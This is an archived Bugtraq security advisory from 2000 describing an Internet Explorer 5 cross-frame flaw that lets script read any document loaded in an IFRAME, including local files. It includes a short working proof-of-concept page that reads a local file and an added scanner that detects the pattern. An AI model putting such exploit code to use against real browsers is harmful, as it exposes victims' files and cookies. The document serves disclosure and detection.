[15219] in bugtraq


IE 5 Cross-frame security vulnerability using IFRAME and WebBrowser control

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Tue Jun 6 15:10:24 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-Id:  <393CEF33.72D81BB5@nat.bg>
Date:         Tue, 6 Jun 2000 15:31:47 +0300
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@SECURITYFOCUS.COM

Georgi Guninski security advisory #12, 2000

IE 5 Cross-frame security vulnerability using IFRAME and WebBrowser
control

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.01 under Windows 98 (other versions are presumably
also vulnerable) allows circumventing the "cross frame security policy":
JavaScript can reach the DOM of a document loaded in an IFRAME, whatever
its origin, through the IFRAME's underlying WebBrowser control.
This exposes the whole DOM of the target document and opens lots of
security risks: reading local files, reading files from any host the
victim's browser can reach, window spoofing, stealing cookies, etc.

Details:

In IE the IFRAME element appears to be a wrapper around the WebBrowser
control, and the control's events can be captured from script with the
<SCRIPT FOR=... EVENT=...> binding.
The problem is the NavigateComplete2 event: when it fires, the argument
it passes is the WebBrowser control itself.
The control has an accessible "document" property that gives the DOM of
the document just loaded, and the cross-frame check that normally stops
script from one origin reading a frame holding a document from another
origin is not applied on this path. Navigating the frame to any URL,
including a file:// URL, and reading the control's document in the
event handler is therefore enough.

Note: this is similar to the vulnerability discovered by Andrew Nosenko
(which is already fixed):
http://www.ntsecurity.net/go/loader.asp?iD=/security/ie5-17.htm (could
not find a better link)

The code is:
------frame2.html--------------------------------
<IFRAME ID="I1"></IFRAME>
<!-- IE-specific binding: run this script when the NavigateComplete2
     event of the IFRAME's WebBrowser control fires; b is the control -->
<SCRIPT for=I1 event="NavigateComplete2(b)">
// b.document is the DOM of whatever the frame just loaded, here a
// local file; the cross-frame check does not stop this read
alert("Here is your file:\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
// Navigate the frame to a local file, once immediately and once again
// after one second
I1.navigate("file://c:/test.txt");
setTimeout('I1.navigate("file://c:/test.txt")',1000);
</SCRIPT>
---------------------------------------------------

Demonstration is available at: http://www.nat.bg/~joro/frame2.html
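The pattern above is easy to recognise in page content, which helps when
scanning captured HTML or proxy logs for attempts. The scanner below is an
added example written for this page, not code from the advisory: it flags
IE's <SCRIPT FOR=id EVENT=name(...)> binding when it targets an IFRAME id
with a WebBrowser-control event, and navigate() calls on that frame, with
file:// targets singled out. The sample pages are constructed inline (the
first reproduces frame2.html). NavigateComplete2 is the event the advisory
names; DocumentComplete and BeforeNavigate2 are other WebBrowser control
events included on the assumption that they are reachable the same way,
which the advisory does not confirm. The finding labels are this
example's own.

```javascript
// Added example for this page, not code from the advisory: a content
// scanner for the IFRAME / WebBrowser-control event hook Guninski
// describes. Signatures are derived from frame2.html; the extra event
// names and the finding labels are this example's own assumptions.

// Events of the WebBrowser control that hand the control (and so its
// "document" property) to script.
const WEBBROWSER_EVENTS = new Set([
  'navigatecomplete2',  // the event named in the advisory
  'documentcomplete',   // assumed: other WebBrowser events, not confirmed
  'beforenavigate2',    // by the advisory to be reachable via IFRAME
]);

// Return the ids of all IFRAME elements in the page.
function iframeIds(html) {
  const ids = new Set();
  const re = /<iframe\b[^>]*\bid\s*=\s*["']?([\w-]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) ids.add(m[1]);
  return ids;
}

// Scan one HTML document and return a list of findings (empty = clean).
function scanHtml(html) {
  const findings = [];
  const frames = iframeIds(html);
  let m;

  // IE's declarative binding: <SCRIPT FOR=I1 EVENT="NavigateComplete2(b)">
  const tagRe = /<script\b([^>]*)>/gi;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const target = /\bfor\s*=\s*["']?([\w-]+)/i.exec(attrs);
    const event = /\bevent\s*=\s*["']?(\w+)\s*\(/i.exec(attrs);
    if (target && event && frames.has(target[1]) &&
        WEBBROWSER_EVENTS.has(event[1].toLowerCase())) {
      findings.push({ kind: 'iframe-webbrowser-event-hook',
                      target: target[1], event: event[1] });
    }
  }

  // Script-driven navigation of a frame: I1.navigate("url")
  const navRe = /\b([\w-]+)\.navigate\s*\(\s*["']([^"']*)["']/gi;
  while ((m = navRe.exec(html)) !== null) {
    const [, target, url] = m;
    if (!frames.has(target)) continue;
    const local = /^file:/i.test(url.trim());
    findings.push({ kind: local ? 'iframe-navigate-local-file'
                                : 'iframe-navigate', target, url });
  }
  return findings;
}

// The advisory's exact pattern: an event hook and a file:// navigation
// on the same frame id.
function isExploitPattern(findings) {
  const hooked = new Set(findings
    .filter(f => f.kind === 'iframe-webbrowser-event-hook')
    .map(f => f.target));
  return findings.some(f => f.kind === 'iframe-navigate-local-file' &&
                            hooked.has(f.target));
}

// Constructed samples: the first reproduces the advisory's frame2.html,
// the second is an ordinary page with a frame and a window event handler.
const FRAME2_HTML = `
<IFRAME  ID="I1"></IFRAME>
<SCRIPT for=I1 event="NavigateComplete2(b)">
alert("Here is your file:\\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
I1.navigate("file://c:/test.txt");
setTimeout('I1.navigate("file://c:/test.txt")',1000);
</SCRIPT>
`;

const BENIGN_HTML = `
<IFRAME ID="ad" SRC="http://www.example.com/"></IFRAME>
<SCRIPT for=window event="onload()">init();</SCRIPT>
`;

console.log(JSON.stringify(scanHtml(FRAME2_HTML), null, 1),
            isExploitPattern(scanHtml(FRAME2_HTML)));
```

The scan is intentionally loose on attribute quoting and case because IE
accepted all of those forms; tighten the event list or require the hook
and navigation to refer to the same frame (isExploitPattern) when false
positives matter more than coverage.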

Workaround: Disable Active Scripting for the zone the attacking page is
loaded from (for a page on the Internet, the Internet zone: in IE 5,
Tools > Internet Options > Security > Custom Level, under Scripting set
"Active scripting" to Disable). This blocks all script in that zone, not
just this attack.

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
